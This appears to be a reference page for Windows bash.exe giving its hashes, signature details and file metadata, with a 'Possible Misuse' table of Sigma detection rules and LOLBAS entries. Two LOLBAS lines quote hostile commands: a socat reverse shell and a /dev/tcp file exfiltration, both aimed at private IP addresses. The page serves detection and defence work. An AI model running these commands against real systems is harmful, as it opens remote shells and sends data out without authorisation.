bash.exe

  • File Path: C:\Windows\system32\bash.exe
  • Description: Microsoft Bash Launcher

Hashes

Type Hash
MD5 FB0A628075D0396D905BD689F5C08D5E
SHA1 5E4EF17328EC5C939F3E6A0DAD0B23432CFD61DB
SHA256 E7FD310E7E8677A8C497EFADD42F2CA67D868CAD07E569E8092B1A1FBA17EC99
SHA384 3A32401A8F9293B3B73812DCAC825065D54418300BCBCAEAE0FC9EBC7BA283F775C69577F47B7F8F2673F6F58FCDF68E
SHA512 5B9273188C9D635410AEC98E1175DBED1D5A4B8BD91C50CBE02C79B3C249E1630B5091187D2DC15FD964BA8868BC4A2FFB36FA7D71C2F2A004551CCBC2E9F135
SSDEEP 6144:HzOZYndZkEXDvoc9qQEbjjOF59xXpJ2CnD8SWLWY:6ZYdZRXDvCQmjcFdD8S

Runtime Data

Usage (stdout):

Windows Subsystem for Linux has no installed distributions.
Distributions can be installed by visiting the Microsoft Store:
https://aka.ms/wslstore

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: Bash.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.17763.1 (WinBuild.160101.0800)
  • Product Version: 10.0.17763.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of bash.exe being misused. While bash.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\bash.exe' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\bash.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_lobas_bash.yml - bash.exe DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_from_mssql.yml - '\bash.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_from_winrm.yml - '*\bash.exe' DRL 1.0
sigma proc_creation_win_webshell_spawn.yml - '\bash.exe' DRL 1.0
LOLBAS Bash.yml Name: Bash.exe  
LOLBAS Bash.yml - Command: bash.exe -c calc.exe  
LOLBAS Bash.yml Description: Executes calc.exe from bash.exe  
LOLBAS Bash.yml - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"  
LOLBAS Bash.yml - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'  
LOLBAS Bash.yml - Path: C:\Windows\System32\bash.exe  
LOLBAS Bash.yml - Path: C:\Windows\SysWOW64\bash.exe  
LOLBAS Bash.yml - IOC: Child process from bash.exe  

MIT License. Copyright (c) 2020-2021 Strontic.